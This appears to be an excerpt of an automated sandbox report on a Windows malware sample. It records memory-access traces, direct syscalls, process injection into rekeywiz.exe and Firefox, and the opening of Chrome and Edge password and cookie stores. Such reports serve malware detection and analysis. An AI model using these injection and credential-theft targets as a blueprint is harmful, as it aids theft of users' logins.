                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01690710 mov eax, dword ptr fs:[00000030h]4_2_01690710
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016827ED mov eax, dword ptr fs:[00000030h]4_2_016827ED
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016827ED mov eax, dword ptr fs:[00000030h]4_2_016827ED
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016827ED mov eax, dword ptr fs:[00000030h]4_2_016827ED
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016EE7E1 mov eax, dword ptr fs:[00000030h]4_2_016EE7E1
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016647FB mov eax, dword ptr fs:[00000030h]4_2_016647FB
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016647FB mov eax, dword ptr fs:[00000030h]4_2_016647FB
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0166C7C0 mov eax, dword ptr fs:[00000030h]4_2_0166C7C0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E07C3 mov eax, dword ptr fs:[00000030h]4_2_016E07C3
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016607AF mov eax, dword ptr fs:[00000030h]4_2_016607AF
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_017147A0 mov eax, dword ptr fs:[00000030h]4_2_017147A0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0170678E mov eax, dword ptr fs:[00000030h]4_2_0170678E
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169A660 mov eax, dword ptr fs:[00000030h]4_2_0169A660
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169A660 mov eax, dword ptr fs:[00000030h]4_2_0169A660
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0172866E mov eax, dword ptr fs:[00000030h]4_2_0172866E
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0172866E mov eax, dword ptr fs:[00000030h]4_2_0172866E
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01692674 mov eax, dword ptr fs:[00000030h]4_2_01692674
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0167C640 mov eax, dword ptr fs:[00000030h]4_2_0167C640
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0167E627 mov eax, dword ptr fs:[00000030h]4_2_0167E627
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01696620 mov eax, dword ptr fs:[00000030h]4_2_01696620
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01698620 mov eax, dword ptr fs:[00000030h]4_2_01698620
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0166262C mov eax, dword ptr fs:[00000030h]4_2_0166262C
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DE609 mov eax, dword ptr fs:[00000030h]4_2_016DE609
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0167260B mov eax, dword ptr fs:[00000030h]4_2_0167260B
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0167260B mov eax, dword ptr fs:[00000030h]4_2_0167260B
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0167260B mov eax, dword ptr fs:[00000030h]4_2_0167260B
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0167260B mov eax, dword ptr fs:[00000030h]4_2_0167260B
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0167260B mov eax, dword ptr fs:[00000030h]4_2_0167260B
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0167260B mov eax, dword ptr fs:[00000030h]4_2_0167260B
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0167260B mov eax, dword ptr fs:[00000030h]4_2_0167260B
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2619 mov eax, dword ptr fs:[00000030h]4_2_016A2619
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DE6F2 mov eax, dword ptr fs:[00000030h]4_2_016DE6F2
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DE6F2 mov eax, dword ptr fs:[00000030h]4_2_016DE6F2
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DE6F2 mov eax, dword ptr fs:[00000030h]4_2_016DE6F2
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DE6F2 mov eax, dword ptr fs:[00000030h]4_2_016DE6F2
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E06F1 mov eax, dword ptr fs:[00000030h]4_2_016E06F1
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E06F1 mov eax, dword ptr fs:[00000030h]4_2_016E06F1
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169A6C7 mov ebx, dword ptr fs:[00000030h]4_2_0169A6C7
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169A6C7 mov eax, dword ptr fs:[00000030h]4_2_0169A6C7
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169C6A6 mov eax, dword ptr fs:[00000030h]4_2_0169C6A6
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016966B0 mov eax, dword ptr fs:[00000030h]4_2_016966B0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01664690 mov eax, dword ptr fs:[00000030h]4_2_01664690
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01664690 mov eax, dword ptr fs:[00000030h]4_2_01664690
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01704978 mov eax, dword ptr fs:[00000030h]4_2_01704978
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01704978 mov eax, dword ptr fs:[00000030h]4_2_01704978
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01686962 mov eax, dword ptr fs:[00000030h]4_2_01686962
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01686962 mov eax, dword ptr fs:[00000030h]4_2_01686962
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01686962 mov eax, dword ptr fs:[00000030h]4_2_01686962
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016EC97C mov eax, dword ptr fs:[00000030h]4_2_016EC97C
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E0946 mov eax, dword ptr fs:[00000030h]4_2_016E0946
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01734940 mov eax, dword ptr fs:[00000030h]4_2_01734940
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E892A mov eax, dword ptr fs:[00000030h]4_2_016E892A
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016F892B mov eax, dword ptr fs:[00000030h]4_2_016F892B
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DE908 mov eax, dword ptr fs:[00000030h]4_2_016DE908
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DE908 mov eax, dword ptr fs:[00000030h]4_2_016DE908
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016EC912 mov eax, dword ptr fs:[00000030h]4_2_016EC912
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01658918 mov eax, dword ptr fs:[00000030h]4_2_01658918
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01658918 mov eax, dword ptr fs:[00000030h]4_2_01658918
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016EE9E0 mov eax, dword ptr fs:[00000030h]4_2_016EE9E0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016929F9 mov eax, dword ptr fs:[00000030h]4_2_016929F9
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016929F9 mov eax, dword ptr fs:[00000030h]4_2_016929F9
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0172A9D3 mov eax, dword ptr fs:[00000030h]4_2_0172A9D3
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016F69C0 mov eax, dword ptr fs:[00000030h]4_2_016F69C0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0166A9D0 mov eax, dword ptr fs:[00000030h]4_2_0166A9D0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0166A9D0 mov eax, dword ptr fs:[00000030h]4_2_0166A9D0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0166A9D0 mov eax, dword ptr fs:[00000030h]4_2_0166A9D0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0166A9D0 mov eax, dword ptr fs:[00000030h]4_2_0166A9D0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0166A9D0 mov eax, dword ptr fs:[00000030h]4_2_0166A9D0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0166A9D0 mov eax, dword ptr fs:[00000030h]4_2_0166A9D0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016949D0 mov eax, dword ptr fs:[00000030h]4_2_016949D0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016729A0 mov eax, dword ptr fs:[00000030h]4_2_016729A0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016729A0 mov eax, dword ptr fs:[00000030h]4_2_016729A0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016729A0 mov eax, dword ptr fs:[00000030h]4_2_016729A0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016729A0 mov eax, dword ptr fs:[00000030h]4_2_016729A0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016729A0 mov eax, dword ptr fs:[00000030h]4_2_016729A0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016729A0 mov eax, dword ptr fs:[00000030h]4_2_016729A0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016729A0 mov eax, dword ptr fs:[00000030h]4_2_016729A0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016729A0 mov eax, dword ptr fs:[00000030h]4_2_016729A0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016729A0 mov eax, dword ptr fs:[00000030h]4_2_016729A0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016729A0 mov eax, dword ptr fs:[00000030h]4_2_016729A0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016729A0 mov eax, dword ptr fs:[00000030h]4_2_016729A0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016729A0 mov eax, dword ptr fs:[00000030h]4_2_016729A0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016729A0 mov eax, dword ptr fs:[00000030h]4_2_016729A0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016609AD mov eax, dword ptr fs:[00000030h]4_2_016609AD
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016609AD mov eax, dword ptr fs:[00000030h]4_2_016609AD
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E89B3 mov esi, dword ptr fs:[00000030h]4_2_016E89B3
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E89B3 mov eax, dword ptr fs:[00000030h]4_2_016E89B3
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E89B3 mov eax, dword ptr fs:[00000030h]4_2_016E89B3
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016EE872 mov eax, dword ptr fs:[00000030h]4_2_016EE872
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016EE872 mov eax, dword ptr fs:[00000030h]4_2_016EE872
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016F6870 mov eax, dword ptr fs:[00000030h]4_2_016F6870
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016F6870 mov eax, dword ptr fs:[00000030h]4_2_016F6870
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01690854 mov eax, dword ptr fs:[00000030h]4_2_01690854
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01664859 mov eax, dword ptr fs:[00000030h]4_2_01664859
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01664859 mov eax, dword ptr fs:[00000030h]4_2_01664859
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0170483A mov eax, dword ptr fs:[00000030h]4_2_0170483A
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0170483A mov eax, dword ptr fs:[00000030h]4_2_0170483A
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169A830 mov eax, dword ptr fs:[00000030h]4_2_0169A830
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01682835 mov eax, dword ptr fs:[00000030h]4_2_01682835
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01682835 mov eax, dword ptr fs:[00000030h]4_2_01682835
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01682835 mov eax, dword ptr fs:[00000030h]4_2_01682835
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01682835 mov ecx, dword ptr fs:[00000030h]4_2_01682835
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01682835 mov eax, dword ptr fs:[00000030h]4_2_01682835
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01682835 mov eax, dword ptr fs:[00000030h]4_2_01682835
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016EC810 mov eax, dword ptr fs:[00000030h]4_2_016EC810
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169C8F9 mov eax, dword ptr fs:[00000030h]4_2_0169C8F9
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169C8F9 mov eax, dword ptr fs:[00000030h]4_2_0169C8F9
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0172A8E4 mov eax, dword ptr fs:[00000030h]4_2_0172A8E4
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_017308C0 mov eax, dword ptr fs:[00000030h]4_2_017308C0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01660887 mov eax, dword ptr fs:[00000030h]4_2_01660887
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016EC89D mov eax, dword ptr fs:[00000030h]4_2_016EC89D
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0165CB7E mov eax, dword ptr fs:[00000030h]4_2_0165CB7E
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0170EB50 mov eax, dword ptr fs:[00000030h]4_2_0170EB50
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01732B57 mov eax, dword ptr fs:[00000030h]4_2_01732B57
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01732B57 mov eax, dword ptr fs:[00000030h]4_2_01732B57
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01732B57 mov eax, dword ptr fs:[00000030h]4_2_01732B57
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01732B57 mov eax, dword ptr fs:[00000030h]4_2_01732B57
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016F6B40 mov eax, dword ptr fs:[00000030h]4_2_016F6B40
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016F6B40 mov eax, dword ptr fs:[00000030h]4_2_016F6B40
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01708B42 mov eax, dword ptr fs:[00000030h]4_2_01708B42
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0172AB40 mov eax, dword ptr fs:[00000030h]4_2_0172AB40
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01658B50 mov eax, dword ptr fs:[00000030h]4_2_01658B50
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01714B4B mov eax, dword ptr fs:[00000030h]4_2_01714B4B
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01714B4B mov eax, dword ptr fs:[00000030h]4_2_01714B4B
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0168EB20 mov eax, dword ptr fs:[00000030h]4_2_0168EB20
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0168EB20 mov eax, dword ptr fs:[00000030h]4_2_0168EB20
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01728B28 mov eax, dword ptr fs:[00000030h]4_2_01728B28
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01728B28 mov eax, dword ptr fs:[00000030h]4_2_01728B28
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DEB1D mov eax, dword ptr fs:[00000030h]4_2_016DEB1D
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DEB1D mov eax, dword ptr fs:[00000030h]4_2_016DEB1D
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DEB1D mov eax, dword ptr fs:[00000030h]4_2_016DEB1D
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DEB1D mov eax, dword ptr fs:[00000030h]4_2_016DEB1D
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DEB1D mov eax, dword ptr fs:[00000030h]4_2_016DEB1D
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DEB1D mov eax, dword ptr fs:[00000030h]4_2_016DEB1D
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DEB1D mov eax, dword ptr fs:[00000030h]4_2_016DEB1D
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DEB1D mov eax, dword ptr fs:[00000030h]4_2_016DEB1D
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DEB1D mov eax, dword ptr fs:[00000030h]4_2_016DEB1D
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01734B00 mov eax, dword ptr fs:[00000030h]4_2_01734B00
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01668BF0 mov eax, dword ptr fs:[00000030h]4_2_01668BF0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01668BF0 mov eax, dword ptr fs:[00000030h]4_2_01668BF0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01668BF0 mov eax, dword ptr fs:[00000030h]4_2_01668BF0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016ECBF0 mov eax, dword ptr fs:[00000030h]4_2_016ECBF0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0170EBD0 mov eax, dword ptr fs:[00000030h]4_2_0170EBD0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01660BCD mov eax, dword ptr fs:[00000030h]4_2_01660BCD
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01660BCD mov eax, dword ptr fs:[00000030h]4_2_01660BCD
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01660BCD mov eax, dword ptr fs:[00000030h]4_2_01660BCD
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01714BB0 mov eax, dword ptr fs:[00000030h]4_2_01714BB0
                Source: C:\Users\user\Desktop\hh01FRs81x.exe; Process token adjusted: Debug
                Source: C:\Users\user\Desktop\hh01FRs81x.exe; Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source (all entries below): C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exe
                NtTerminateThread: Direct from: 0x77D32FCC
                NtSetInformationThread: Direct from: 0x77D263F9
                NtQueryInformationToken: Direct from: 0x77D32CAC
                NtCreateFile: Direct from: 0x77D32FEC
                NtOpenFile: Direct from: 0x77D32DCC
                NtSetInformationProcess: Direct from: 0x77D32C5C
                NtProtectVirtualMemory: Direct from: 0x77D32F9C
                NtOpenKeyEx: Direct from: 0x77D32B9C
                NtResumeThread: Direct from: 0x77D336AC
                NtMapViewOfSection: Direct from: 0x77D32D1C
                NtWriteVirtualMemory: Direct from: 0x77D32E3C
                NtCreateMutant: Direct from: 0x77D335CC
                NtNotifyChangeKey: Direct from: 0x77D33C2C
                NtQuerySystemInformation: Direct from: 0x77D32DFC
                NtReadFile: Direct from: 0x77D32ADC
                NtAllocateVirtualMemory: Direct from: 0x77D32BFC
                NtCreateUserProcess: Direct from: 0x77D3371C
                NtQueryInformationProcess: Direct from: 0x77D32C26
                NtResumeThread: Direct from: 0x77D32FBC
                NtDelayExecution: Direct from: 0x77D32DDC
                NtQueryAttributesFile: Direct from: 0x77D32E6C
                NtSetInformationThread: Direct from: 0x77D32B4C
                NtReadVirtualMemory: Direct from: 0x77D32E8C
                NtCreateKey: Direct from: 0x77D32C6C
                NtClose: Direct from: 0x77D32B6C
                NtAllocateVirtualMemory: Direct from: 0x77D33C9C
                NtWriteVirtualMemory: Direct from: 0x77D3490C
                NtOpenSection: Direct from: 0x77D32E0C
                NtQueryVolumeInformationFile: Direct from: 0x77D32F2C
                NtAllocateVirtualMemory: Direct from: 0x77D348EC
                NtAllocateVirtualMemory: Direct from: 0x77D32BEC
                NtDeviceIoControlFile: Direct from: 0x77D32AEC
                NtQuerySystemInformation: Direct from: 0x77D348CC
                Source: C:\Users\user\Desktop\hh01FRs81x.exe; Memory written: C:\Users\user\Desktop\hh01FRs81x.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\hh01FRs81x.exe; Section loaded: NULL target: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\hh01FRs81x.exe; Section loaded: NULL target: C:\Windows\SysWOW64\rekeywiz.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\rekeywiz.exe; Section loaded: NULL target: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exe protection: read write
                Source: C:\Windows\SysWOW64\rekeywiz.exe; Section loaded: NULL target: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\rekeywiz.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\rekeywiz.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\rekeywiz.exe; Thread register set: target process: 2944
                Source: C:\Windows\SysWOW64\rekeywiz.exe; Thread APC queued: target process: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exe
                Source: C:\Users\user\Desktop\hh01FRs81x.exe; Process created: C:\Users\user\Desktop\hh01FRs81x.exe "C:\Users\user\Desktop\hh01FRs81x.exe"
                Source: C:\Users\user\Desktop\hh01FRs81x.exe; Process created: C:\Users\user\Desktop\hh01FRs81x.exe "C:\Users\user\Desktop\hh01FRs81x.exe"
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exe; Process created: C:\Windows\SysWOW64\rekeywiz.exe "C:\Windows\SysWOW64\rekeywiz.exe"
                Source: C:\Windows\SysWOW64\rekeywiz.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: Gm9uUaV91ycxNY3GPL6q.exe, 00000006.00000000.1237536690.0000000001241000.00000002.00000001.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 00000006.00000002.3335660073.0000000001240000.00000002.00000001.00040000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000000.1388892276.0000000001060000.00000002.00000001.00040000.00000000.sdmp
                Binary or memory string: Program Manager
                Binary or memory string: Shell_TrayWnd
                Binary or memory string: Progman
                Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\hh01FRs81x.exe; Queries volume information: C:\Users\user\Desktop\hh01FRs81x.exe VolumeInformation
                Source: C:\Users\user\Desktop\hh01FRs81x.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\hh01FRs81x.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\hh01FRs81x.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\hh01FRs81x.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\hh01FRs81x.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\hh01FRs81x.exe; Key value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias

                Stealing of Sensitive Information

                Source: Yara match; File source: 4.2.hh01FRs81x.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 4.2.hh01FRs81x.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000004.00000002.1315969342.00000000015E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000004.00000002.1315269021.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000007.00000002.3336185788.0000000004540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000E.00000002.3338322375.0000000004E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000007.00000002.3336234747.0000000004590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000007.00000002.3334175533.00000000006D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000004.00000002.1317262087.0000000002480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.3336041844.0000000003320000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\rekeywiz.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\rekeywiz.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\rekeywiz.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\rekeywiz.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\rekeywiz.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\rekeywiz.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\rekeywiz.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\rekeywiz.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\rekeywiz.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match; File source: 4.2.hh01FRs81x.exe.400000.0.raw.unpack, type: UNPACKEDPE
